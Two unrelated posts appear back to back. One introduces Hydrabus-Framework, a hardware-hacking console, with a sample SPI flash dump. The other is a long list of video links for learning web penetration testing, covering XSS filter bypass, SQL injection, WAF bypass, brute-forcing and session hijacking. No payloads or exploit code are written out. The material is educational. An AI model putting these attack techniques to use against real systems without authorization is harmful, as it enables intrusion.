Before diving into the main subject: I'm a security engineer and I'm fascinated by hardware security assessment. Since I started playing with hardware tools like the Bus Pirate and Hydrabus, I have noticed that no tool brings together all the necessary scripts to interact with hardware protocols. Who has never been frustrated during a hardware security assessment when facing an exposed chip or debug port without the necessary script to dump it, find the baudrate of a UART port or properly communicate with it? That's why I chose to develop a new framework for the awesome hardware tool Hydrabus, named Hydrabus-Framework (https://github.com/hydrabus-framework/framework). It provides multiple modules allowing you to work efficiently and save time on any hardware project.

This framework works like Metasploit: simply run hbfconsole, select a module using the use command, set the needed options with set, and run it with the run command! It also includes a Miniterm to directly interact with the Hydrabus CLI. At the time of this writing, 3 modules are available.

Modules

hbfmodules.uart.baudrates

This module allows you to detect the baudrate of a UART target. It changes the UART baudrate automatically until it finds the correct value. If it finds a valid baudrate, it prompts you to open a Miniterm session using the Hydrabus binary UART bridge.

hbfmodules.spi.chip_id

The SPI chip_id module allows you to recover the ID of an SPI flash chip, useful to verify that the Hydrabus is correctly interfaced with the target or to identify the family of an unknown chip. It will be improved in the near future to print the manufacturer and chip name if found (like flashrom).

hbfmodules.spi.dump_eeprom

SPI dump_eeprom is used to dump an SPI flash. With this module, you can easily dump a flash memory and not waste your time writing a script to do it. You can rapidly jump to the analysis of the freshly dumped firmware!

More modules are coming soon! You can download the latest modules and update the framework by simply running the hbfupdate script.

Architecture

This framework has been developed with scalability in mind. Indeed, you can add modules without having to modify the framework's core engine. Each module inherits from the abstract class AModule, providing a solid foundation to start coding your own module. Once the module is created and installed using python setup.py install, you can use it in the framework.

Contributing

To create a new module, open an issue on hbfmodules.skeleton; I will create a new repository initialized with the hbfmodules.skeleton repository once you have provided the needed information. You can read more information on contributing to this project in the CONTRIBUTING.md file.

Use case: Dumping an SPI flash chip

ghecko % hbfconsole

[hbfconsole ASCII-art banner]
\ |_| |_| \_\/_/ \_\_| |_|______| \/ \/ \____/|_| \_\_|\_\ [*] 3 modules loaded, run 'hbfupdate' command to install the latest modules [hbf] > use spi/dump_eeprom [hbf] spi(dump_eeprom)> show options Author: Jordan Ovrè Module name: dump SPI EEPROM, version 0.0.2 Description: Module to dump SPI EEPROM Name Value Required Description ------------ ------------ ---------- -------------------------------------------------------------------------- hydrabus /dev/ttyACM0 True Hydrabus device timeout 1 True Hydrabus read timeout dumpfile True The dump filename sectors 1024 True The number of sector (4096) to read. For example 1024 sector * 4096 = 4MiB start_sector 0 True The starting sector (1 sector = 4096 bytes) spi_device 1 True The hydrabus SPI device (1=SPI1 or 0=SPI2) spi_speed slow True set SPI speed (fast = 10.5MHz, slow = 320kHz, medium = 5MHz) spi_polarity 0 True set SPI polarity (1=high or 0=low) spi_phase 0 True set SPI phase (1=high or 0=low) [hbf] spi(dump_eeprom)> set dumpfile firmware.bin dumpfile ==> firmware.bin [hbf] spi(dump_eeprom)> set spi_speed medium spi_speed ==> medium [hbf] spi(dump_eeprom)> run [*] Starting to read chip... Reading 1024 sectors Dump 4.0MiB Readed: 4.0MiB [✔] Finished dumping to firmware.bin [*] Reset hydrabus to console mode [hbf] spi(dump_eeprom)> binwalk firmware.bin DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 134816 0x20EA0 Certificate in DER format (x509 v3), header length: 4, sequence length: 64 150864 0x24D50 U-Boot version string, "U-Boot 1.1.4 (Nov 26 2012 - 15:58:42)" 151232 0x24EC0 CRC32 polynomial table, big endian 160905 0x27489 Copyright string: "copyright." 262208 0x40040 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 2465316 bytes 1114112 0x110000 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2676149 bytes, 1117 inodes, blocksize: 131072 bytes, created: 2013-11-12 09:49:10 3801091 0x3A0003 POSIX tar archive (GNU), owner user name: "_table.tar.gz" You can find the tools and more details on the official github repository: hydrabus-framework 78 Ghecko. Sursa: https://0x00sec.org/t/hydrabus-framework/17057
15. Web Application Penetration Testing

Phase 1 – History
1. History of Internet - https://www.youtube.com/watch?v=9hIQjrMHTv4

Phase 2 – Web and Server Technology
2. Basic concepts of web applications, how they work and the HTTP protocol - https://www.youtube.com/watch?v=RsQ1tFLwldY&t=7s
3. HTML basics part 1 - https://www.youtube.com/watch?v=p6fRBGI_BY0
4. HTML basics part 2 - https://www.youtube.com/watch?v=Zs6lzuBVK2w
5. Difference between static and dynamic website - https://www.youtube.com/watch?v=hlg6q6OFoxQ
6. HTTP protocol Understanding - https://www.youtube.com/watch?v=JFZMyhRTVt0
7. Parts of HTTP Request - https://www.youtube.com/watch?v=pHFWGN-upGM
8. Parts of HTTP Response - https://www.youtube.com/watch?v=c9sMNc2PrMU
9. Various HTTP Methods - https://www.youtube.com/watch?v=PO7D20HsFsY
10. Understanding URLs - https://www.youtube.com/watch?v=5Jr-_Za5yQM
11. Intro to REST - https://www.youtube.com/watch?v=YCcAE2SCQ6k
12. HTTP Request & Response Headers - https://www.youtube.com/watch?v=vAuZwirKjWs
13. What is a cookie - https://www.youtube.com/watch?v=I01XMRo2ESg
14. HTTP Status codes - https://www.youtube.com/watch?v=VLH3FMQ5BIQ
15. HTTP Proxy - https://www.youtube.com/watch?v=qU0PVSJCKcs
16. Authentication with HTTP - https://www.youtube.com/watch?v=GxiFXUFKo1M
17. HTTP basic and digest authentication - https://www.youtube.com/watch?v=GOnhCbDhMzk
18. What is “Server-Side” - https://www.youtube.com/watch?v=JnCLmLO9LhA
19. Server and client side with example - https://www.youtube.com/watch?v=DcBB2Fp8WNI
20. What is a session - https://www.youtube.com/watch?v=WV4DJ6b0jhg&t=202s
21. Introduction to UTF-8 and Unicode - https://www.youtube.com/watch?v=sqPTR_v4qFA
22. URL encoding - https://www.youtube.com/watch?v=Z3udiqgW1VA
23. HTML encoding - https://www.youtube.com/watch?v=IiAfCLWpgII&t=109s
24. Base64 encoding - https://www.youtube.com/watch?v=8qkxeZmKmOY
25. Hex encoding & ASCII - https://www.youtube.com/watch?v=WW2SaCMnHdU

Phase 3 – Setting up the lab with BurpSuite and bWAPP

MANISH AGRAWAL
26. Setup lab with bWAPP - https://www.youtube.com/watch?v=dwtUn3giwTk&index=1&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
27. Set up Burp Suite - https://www.youtube.com/watch?v=hQsT4rSa_v0&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=2
28. Configure Firefox and add certificate - https://www.youtube.com/watch?v=hfsdJ69GSV4&index=3&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
29. Mapping and scoping website - https://www.youtube.com/watch?v=H-_iVteMDRo&index=4&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
30. Spidering - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5
31. Active and passive scanning - https://www.youtube.com/watch?v=1Mjom6AcFyU&index=6&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
32. Scanner options and demo - https://www.youtube.com/watch?v=gANi4Kt7-ek&index=7&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
33. Introduction to password security - https://www.youtube.com/watch?v=FwcUhcLO9iM&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=8
34. Intruder - https://www.youtube.com/watch?v=wtMg9oEMTa8&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=9
35. Intruder attack types - https://www.youtube.com/watch?v=N5ndYPwddkQ&index=10&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
36. Payload settings - https://www.youtube.com/watch?v=5GpdlbtL-1Q&index=11&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
37. Intruder settings - https://www.youtube.com/watch?v=B_Mu7jmOYnU&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=12

ÆTHER SECURITY LAB
38. No.1 Penetration testing tool - https://www.youtube.com/watch?v=AVzC7ETqpDo&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=1
39. Environment Setup - https://www.youtube.com/watch?v=yqnUOdr0eVk&index=2&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA
40. General concept - https://www.youtube.com/watch?v=udl4oqr_ylM&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=3
41. Proxy module - https://www.youtube.com/watch?v=PDTwYFkjQBE&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=4
42. Repeater module - https://www.youtube.com/watch?v=9Zh_7s5csCc&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=5
43. Target and spider module - https://www.youtube.com/watch?v=dCKPZUSOlr8&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=6
44. Sequencer and scanner module - https://www.youtube.com/watch?v=G-v581pXerE&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=7

Phase 4 – Mapping the application and attack surface
45. Spidering - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5
46. Mapping application using robots.txt - https://www.youtube.com/watch?v=akuzgZ75zrk
47. Discover hidden contents using dirbuster - https://www.youtube.com/watch?v=--nu9Jq07gA
48. Dirbuster in detail - https://www.youtube.com/watch?v=2tOQC68hAcQ
49. Discover hidden directories and files with intruder - https://www.youtube.com/watch?v=4Fz9mJeMNkI
50. Directory bruteforcing 1 - https://www.youtube.com/watch?v=ch2onB_LFoI
51. Directory bruteforcing 2 - https://www.youtube.com/watch?v=ASMW_oLbyIg
52. Identify application entry points - https://www.youtube.com/watch?v=IgJWPZ2OKO8&t=34s
53. Identify application entry points - https://www.owasp.org/index.php/Identify_application_entry_points_(OTG-INFO-006)
54. Identify client and server technology - https://www.youtube.com/watch?v=B8jN_iWjtyM
55. Identify server technology using banner grabbing (telnet) - https://www.youtube.com/watch?v=O67M-U2UOAg
56. Identify server technology using httprecon - https://www.youtube.com/watch?v=xBBHtS-dwsM
57. Pentesting with Google dorks Introduction - https://www.youtube.com/watch?v=NmdrKFwAw9U
58. Fingerprinting web server - https://www.youtube.com/watch?v=tw2VdG0t5kc&list=PLxLRoXCDIalcRS5Nb1I_HM_OzS10E6lqp&index=10
59. Use Nmap for fingerprinting web server - https://www.youtube.com/watch?v=VQV-y_-AN80
60. Review web servers' metafiles for information leakage - https://www.youtube.com/watch?v=sds3Zotf_ZY
61. Enumerate applications on web server - https://www.youtube.com/watch?v=lfhvvTLN60E
62. Identify application entry points - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLDeogY2Qr-tGR2NL2X1AR5Zz9t1iaWwlM
63. Map execution path through application - https://www.youtube.com/watch?v=0I0NPiyo9UI
64. Fingerprint web application frameworks - https://www.youtube.com/watch?v=ASzG0kBoE4c

Phase 5 – Understanding and exploiting OWASP top 10 vulnerabilities
65. A closer look at all owasp top 10 vulnerabilities - https://www.youtube.com/watch?v=avFR_Af0KGk

IBM
66. Injection - https://www.youtube.com/watch?v=02mLrFVzIYU&index=1&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d
67. Broken authentication and session management - https://www.youtube.com/watch?v=iX49fqZ8HGA&index=2&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d
68. Cross-site scripting - https://www.youtube.com/watch?v=x6I5fCupLLU&index=3&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d
69. Insecure direct object reference - https://www.youtube.com/watch?v=-iCyp9Qz3CI&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=4
70. Security misconfiguration - https://www.youtube.com/watch?v=cIplXL8idyo&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=5
71. Sensitive data exposure - https://www.youtube.com/watch?v=rYlzTQlF8Ws&index=6&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d
72. Missing functional level access controls - https://www.youtube.com/watch?v=VMv_gyCNGpk&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=7
73. Cross-site request forgery - https://www.youtube.com/watch?v=_xSFm3KGxh0&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=8
74. Using components with known vulnerabilities - https://www.youtube.com/watch?v=bhJmVBJ-F-4&index=9&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d
75. Unvalidated redirects and forwards - https://www.youtube.com/watch?v=L6bYKiLtSL8&index=10&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d

F5 CENTRAL
76. Injection - https://www.youtube.com/watch?v=rWHvp7rUka8&index=1&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD
77. Broken authentication and session management - https://www.youtube.com/watch?v=mruO75ONWy8&index=2&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD
78. Insecure deserialisation - https://www.youtube.com/watch?v=nkTBwbnfesQ&index=8&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD
79. Sensitive data exposure - https://www.youtube.com/watch?v=2RKbacrkUBU&index=3&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD
80. Broken access control - https://www.youtube.com/watch?v=P38at6Tp8Ms&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD&index=5
81. Insufficient logging and monitoring - https://www.youtube.com/watch?v=IFF3tkUOF5E&index=10&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD
82. XML external entities - https://www.youtube.com/watch?v=g2ey7ry8_CQ&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD&index=4
83. Using components with known vulnerabilities - https://www.youtube.com/watch?v=IGsNYVDKRV0&index=9&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD
84. Cross-site scripting - https://www.youtube.com/watch?v=IuzU4y-UjLw&index=7&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD
85. Security misconfiguration - https://www.youtube.com/watch?v=JuGSUMtKTPU&index=6&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD

LUKE BRINER
86. Injection explained - https://www.youtube.com/watch?v=1qMggPJpRXM&index=1&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X
87. Broken authentication and session management - https://www.youtube.com/watch?v=fKnG15BL4AY&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=2
88. Cross-site scripting - https://www.youtube.com/watch?v=ksM-xXeDUNs&index=3&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X
89. Insecure direct object reference - https://www.youtube.com/watch?v=ZodA76-CB10&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=4
90. Security misconfiguration - https://www.youtube.com/watch?v=DfFPHKPCofY&index=5&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X
91. Sensitive data exposure - https://www.youtube.com/watch?v=Z7hafbGDVEE&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=6
92. Missing functional level access control - https://www.youtube.com/watch?v=RGN3w831Elo&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=7
93. Cross-site request forgery - https://www.youtube.com/watch?v=XRW_US5BCxk&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=8
94. Components with known vulnerabilities - https://www.youtube.com/watch?v=pbvDW9pJdng&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=9
95. Unvalidated redirects and forwards - https://www.youtube.com/watch?v=bHTglpgC5Qg&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=10

Phase 6 – Session management testing
96. Bypass authentication using cookie manipulation - https://www.youtube.com/watch?v=mEbmturLljU
97. Cookie Security Via httponly and secure Flag - OWASP - https://www.youtube.com/watch?v=3aKA4RkAg78
98. Penetration testing Cookies basic - https://www.youtube.com/watch?v=_P7KN8T1boc
99. Session fixation 1 - https://www.youtube.com/watch?v=ucmgeHKtxaI
100. Session fixation 2 - https://www.youtube.com/watch?v=0Tu1qxysWOk
101. Session fixation 3 - https://www.youtube.com/watch?v=jxwgpWvRUSo
102. Session fixation 4 - https://www.youtube.com/watch?v=eUbtW0Z0W1g
103. CSRF - Cross site request forgery 1 - https://www.youtube.com/watch?v=m0EHlfTgGUU
104. CSRF - Cross site request forgery 2 - https://www.youtube.com/watch?v=H3iu0_ltcv4
105. CSRF - Cross site request forgery 3 - https://www.youtube.com/watch?v=1NO4I28J-0s
106. CSRF - Cross site request forgery 4 - https://www.youtube.com/watch?v=XdEJEUJ0Fr8
107. CSRF - Cross site request forgery 5 - https://www.youtube.com/watch?v=TwG0Rd0hr18
108. Session puzzling 1 - https://www.youtube.com/watch?v=YEOvmhTb8xA
109. Admin bypass using session hijacking - https://www.youtube.com/watch?v=1wp1o-1TfAc

Phase 7 – Bypassing client-side controls
110. What is hidden forms in HTML - https://www.youtube.com/watch?v=orUoGsgaYAE
111. Bypassing hidden form fields using tamper data - https://www.youtube.com/watch?v=NXkGX2sPw7I
112. Bypassing hidden form fields using Burp Suite (Purchase application) - https://www.youtube.com/watch?v=xahvJyUFTfM
113. Changing price on eCommerce website using parameter tampering - https://www.youtube.com/watch?v=A-ccNpP06Zg
114. Understanding cookie in detail - https://www.youtube.com/watch?v=_P7KN8T1boc&list=PLWPirh4EWFpESKWJmrgQwmsnTrL_K93Wi&index=18
115. Cookie tampering with tamper data - https://www.youtube.com/watch?v=NgKXm0lBecc
116. Cookie tamper part 2 - https://www.youtube.com/watch?v=dTCt_I2DWgo
117. Understanding referer header in depth using Cisco product - https://www.youtube.com/watch?v=GkQnBa3C7WI&t=35s
118. Introduction to ASP.NET viewstate - https://www.youtube.com/watch?v=L3p6Uw6SSXs
119. ASP.NET viewstate in depth - https://www.youtube.com/watch?v=Fn_08JLsrmY
120. Analyse sensitive data in ASP.NET viewstate - https://msdn.microsoft.com/en-us/library/ms972427.aspx?f=255&MSPPError=-2147217396
121. Cross-origin-resource-sharing explanation with example - https://www.youtube.com/watch?v=Ka8vG5miErk
122. CORS demo 1 - https://www.youtube.com/watch?v=wR8pjTWaEbs
123. CORS demo 2 - https://www.youtube.com/watch?v=lg31RYYG-T4
124. Security headers - https://www.youtube.com/watch?v=TNlcoYLIGFk
125. Security headers 2 - https://www.youtube.com/watch?v=ZZUvmVkkKu4

Phase 8 – Attacking authentication/login
126. Attacking login panel with bad password - Guess the username and password for the website and try different combinations
127. Brute-force login panel - https://www.youtube.com/watch?v=25cazx5D_vw
128. Username enumeration - https://www.youtube.com/watch?v=WCO7LnSlskE
129. Username enumeration with bruteforce password attack - https://www.youtube.com/watch?v=zf3-pYJU1c4
130. Authentication over insecure HTTP protocol - https://www.youtube.com/watch?v=ueSG7TUqoxk
131. Authentication over insecure HTTP protocol - https://www.youtube.com/watch?v=_WQe36pZ3mA
132. Forgot password vulnerability - case 1 - https://www.youtube.com/watch?v=FEUidWWnZwU
133. Forgot password vulnerability - case 2 - https://www.youtube.com/watch?v=j7-8YyYdWL4
134. Login page autocomplete feature enabled - https://www.youtube.com/watch?v=XNjUfwDmHGc&t=33s
135. Testing for weak password policy - https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007)
136. Insecure distribution of credentials - When you register on a website, or request a password reset using the forgot password feature, and the website sends your username and password over email in cleartext instead of sending a password reset link, that is a vulnerability.
137. Test for credentials transportation using SSL/TLS certificate - https://www.youtube.com/watch?v=21_IYz4npRs
138. Basics of MySQL - https://www.youtube.com/watch?v=yPu6qV5byu4
139. Testing browser cache - https://www.youtube.com/watch?v=2T_Xz3Humdc
140. Bypassing login panel - case 1 - https://www.youtube.com/watch?v=TSqXkkOt6oM
141. Bypass login panel - case 2 - https://www.youtube.com/watch?v=J6v_W-LFK1c

Phase 9 – Attacking access controls (IDOR, Priv esc, hidden files and directories)

Completely unprotected functionalities
142. Finding admin panel - https://www.youtube.com/watch?v=r1k2lgvK3s0
143. Finding admin panel and hidden files and directories - https://www.youtube.com/watch?v=Z0VAPbATy1A
144. Finding hidden webpages with dirbuster - https://www.youtube.com/watch?v=--nu9Jq07gA&t=5s

Insecure direct object reference
145. IDOR case 1 - https://www.youtube.com/watch?v=gci4R9Vkulc
146. IDOR case 2 - https://www.youtube.com/watch?v=4DTULwuLFS0
147. IDOR case 3 (zomato) - https://www.youtube.com/watch?v=tCJBLG5Mayo

Privilege escalation
148. What is privilege escalation - https://www.youtube.com/watch?v=80RzLSrczmc
149. Privilege escalation - Hackme bank - case 1 - https://www.youtube.com/watch?v=g3lv__87cWM
150. Privilege escalation - case 2 - https://www.youtube.com/watch?v=-i4O_hjc87Y

Phase 10 – Attacking input validations (all injections, XSS and misc)

HTTP verb tampering
151. Introduction HTTP verb tampering - https://www.youtube.com/watch?v=Wl0PrIeAnhs
152. HTTP verb tampering demo - https://www.youtube.com/watch?v=bZlkuiUkQzE

HTTP parameter pollution
153. Introduction HTTP parameter pollution - https://www.youtube.com/watch?v=Tosp-JyWVS4
154. HTTP parameter pollution demo 1 - https://www.youtube.com/watch?v=QVZBl8yxVX0&t=11s
155. HTTP parameter pollution demo 2 - https://www.youtube.com/watch?v=YRjxdw5BAM0
156. HTTP parameter pollution demo 3 - https://www.youtube.com/watch?v=kIVefiDrWUw

XSS - Cross site scripting
157. Introduction to XSS - https://www.youtube.com/watch?v=gkMl1suyj3M
158. What is XSS - https://www.youtube.com/watch?v=cbmBDiR6WaY
159. Reflected XSS demo - https://www.youtube.com/watch?v=r79ozjCL7DA
160. XSS attack method using burpsuite - https://www.youtube.com/watch?v=OLKBZNw3OjQ
161. XSS filter bypass with Xenotix - https://www.youtube.com/watch?v=loZSdedJnqc
162. Reflected XSS filter bypass 1 - https://www.youtube.com/watch?v=m5rlLgGrOVA
163. Reflected XSS filter bypass 2 - https://www.youtube.com/watch?v=LDiXveqQ0gg
164. Reflected XSS filter bypass 3 - https://www.youtube.com/watch?v=hb_qENFUdOk
165. Reflected XSS filter bypass 4 - https://www.youtube.com/watch?v=Fg1qqkedGUk
166. Reflected XSS filter bypass 5 - https://www.youtube.com/watch?v=NImym71f3Bc
167. Reflected XSS filter bypass 6 - https://www.youtube.com/watch?v=9eGzAym2a5Q
168. Reflected XSS filter bypass 7 - https://www.youtube.com/watch?v=ObfEI84_MtM
169. Reflected XSS filter bypass 8 - https://www.youtube.com/watch?v=2c9xMe3VZ9Q
170. Reflected XSS filter bypass 9 - https://www.youtube.com/watch?v=-48zknvo7LM
171. Introduction to Stored XSS - https://www.youtube.com/watch?v=SHmQ3sQFeLE
172. Stored XSS 1 - https://www.youtube.com/watch?v=oHIl_pCahsQ
173. Stored XSS 2 - https://www.youtube.com/watch?v=dBTuWzX8hd0
174. Stored XSS 3 - https://www.youtube.com/watch?v=PFG0lkMeYDc
175. Stored XSS 4 - https://www.youtube.com/watch?v=YPUBFklUWLc
176. Stored XSS 5 - https://www.youtube.com/watch?v=x9Zx44EV-Og

SQL injection
177. Part 1 - Install SQLi lab - https://www.youtube.com/watch?v=NJ9AA1_t1Ic&index=23&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro
178. Part 2 - SQL lab series - https://www.youtube.com/watch?v=TA2h_kUqfhU&index=22&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro
179. Part 3 - SQL lab series - https://www.youtube.com/watch?v=N0zAChmZIZU&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=21
180. Part 4 - SQL lab series - https://www.youtube.com/watch?v=6pVxm5mWBVU&index=20&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro
181. Part 5 - SQL lab series - https://www.youtube.com/watch?v=0tyerVP9R98&index=19&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro
182. Part 6 - Double query injection - https://www.youtube.com/watch?v=zaRlcPbfX4M&index=18&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro
183. Part 7 - Double query injection cont.. - https://www.youtube.com/watch?v=9utdAPxmvaI&index=17&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro
184. Part 8 - Blind injection boolean based - https://www.youtube.com/watch?v=u7Z7AIR6cMI&index=16&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro
185. Part 9 - Blind injection time based - https://www.youtube.com/watch?v=gzU1YBu_838&index=15&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro
186. Part 10 - Dumping DB using outfile - https://www.youtube.com/watch?v=ADW844OA6io&index=14&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro
187. Part 11 - Post parameter injection error based - https://www.youtube.com/watch?v=6sQ23tqiTXY&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=13
188. Part 12 - POST parameter injection double query based - https://www.youtube.com/watch?v=tjFXWQY4LuA&index=12&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro
189. Part 13 - POST parameter injection blind boolean and time based - https://www.youtube.com/watch?v=411G-4nH5jE&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=10
190. Part 14 - Post parameter injection in UPDATE query - https://www.youtube.com/watch?v=2FgLcPuU7Vw&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=11
191. Part 15 - Injection in insert query - https://www.youtube.com/watch?v=ZJiPsWxXYZs&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=9
192. Part 16 - Cookie based injection - https://www.youtube.com/watch?v=-A3vVqfP8pA&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=8
193. Part 17 - Second order injection - https://www.youtube.com/watch?v=e9pbC5BxiAE&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=7
194. Part 18 - Bypassing blacklist filters - 1 - https://www.youtube.com/watch?v=5P-knuYoDdw&index=6&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro
195. Part 19 - Bypassing blacklist filters - 2 - https://www.youtube.com/watch?v=45BjuQFt55Y&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=5
196. Part 20 - Bypassing blacklist filters - 3 - https://www.youtube.com/watch?v=c-Pjb_zLpH0&index=4&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro
197. Part 21 - Bypassing WAF - https://www.youtube.com/watch?v=uRDuCXFpHXc&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=2
198. Part 22 - Bypassing WAF - Impedance mismatch - https://www.youtube.com/watch?v=ygVUebdv_Ws&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=3
199. Part 23 - Bypassing addslashes - charset mismatch - https://www.youtube.com/watch?v=du-jkS6-sbo&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=1

NoSQL injection
200. Introduction to NoSQL injection - https://www.youtube.com/watch?v=h0h37-Dwd_A
201. Introduction to SQL vs NoSQL - Difference between MySQL and MongoDB with tutorial - https://www.youtube.com/watch?v=QwevGzVu_zk
202. Abusing NoSQL databases - https://www.youtube.com/watch?v=lcO1BTNh8r8
203. Making cry - attacking NoSQL for pentesters - https://www.youtube.com/watch?v=NgsesuLpyOg

Xpath and XML injection
204. Introduction to Xpath injection - https://www.youtube.com/watch?v=2_UyM6Ea0Yk&t=3102s
205. Introduction to XML injection - https://www.youtube.com/watch?v=9ZokuRHo-eY
206. Practical 1 - bWAPP - https://www.youtube.com/watch?v=6tV8EuaHI9M
207. Practical 2 - Mutillidae - https://www.youtube.com/watch?v=fV0qsqcScI4
208. Practical 3 - webgoat - https://www.youtube.com/watch?v=5ZDSPVp1TpM
209. Hack admin panel using Xpath injection - https://www.youtube.com/watch?v=vvlyYlXuVxI
210. XXE demo - https://www.youtube.com/watch?v=3B8QhyrEXlU
211. XXE demo 2 - https://www.youtube.com/watch?v=UQjxvEwyUUw
212. XXE demo 3 - https://www.youtube.com/watch?v=JI0daBHq6fA

LDAP injection
213. Introduction and practical 1 - https://www.youtube.com/watch?v=-TXFlg7S9ks
214. Practical 2 - https://www.youtube.com/watch?v=wtahzm_R8e4

OS command injection
215. OS command injection in bWAPP - https://www.youtube.com/watch?v=qLIkGJrMY9k
216. bWAPP - OS command injection with Commiux (All levels) - https://www.youtube.com/watch?v=5-1QLbVa8YE

Local file inclusion
217. Detailed introduction - https://www.youtube.com/watch?v=kcojXEwolIs
218. LFI demo 1 - https://www.youtube.com/watch?v=54hSHpVoz7A
219. LFI demo 2 - https://www.youtube.com/watch?v=qPq9hIVtitI

Remote file inclusion
220. Detailed introduction - https://www.youtube.com/watch?v=MZjORTEwpaw
221. RFI demo 1 - https://www.youtube.com/watch?v=gWt9A6eOkq0
222. RFI introduction and demo 2 - https://www.youtube.com/watch?v=htTEfokaKsM

HTTP splitting/smuggling
223. Detailed introduction - https://www.youtube.com/watch?v=bVaZWHrfiPw
224. Demo 1 - https://www.youtube.com/watch?v=mOf4H1aLiiE

Phase 11 – Generating and testing error codes
225. Generate normal error codes by visiting files that may not exist on the server - for example, visit chintan.php or chintan.aspx on any website and it may redirect you to 404.php, 404.aspx or a custom error page. Check whether the error page comes from the default web server or application framework, or whether a custom page is displayed that does not reveal any sensitive information.
226. Use BurpSuite fuzzing techniques to generate stack trace error codes - https://www.youtube.com/watch?v=LDF6OkcvBzM

Phase 12 – Weak cryptography testing
227. SSL/TLS weak configuration explained - https://www.youtube.com/watch?v=Rp3iZUvXWlM
228. Testing weak SSL/TLS ciphers - https://www.youtube.com/watch?v=slbwCMHqCkc
229. Test SSL/TLS security with Qualys guard - https://www.youtube.com/watch?v=Na8KxqmETnw
